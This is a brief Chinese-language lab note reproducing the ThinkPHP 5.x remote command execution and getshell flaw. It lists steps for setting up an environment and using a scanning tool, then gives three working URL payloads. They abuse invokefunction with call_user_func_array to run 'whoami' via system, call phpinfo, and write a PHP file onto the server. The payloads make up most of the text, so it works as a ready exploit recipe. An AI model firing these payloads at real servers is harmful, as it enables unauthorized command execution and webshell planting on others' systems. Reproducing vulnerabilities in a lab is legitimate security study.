thinkphp漏洞再现
Thinkphp5x远程命令执行及getshell
1、开环境
2、使用工具攻击
开启工具
输入地址,点击漏洞检测
存在漏洞之后,选择漏洞,执行命令
3、也可以执行远程命令
执行命令
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php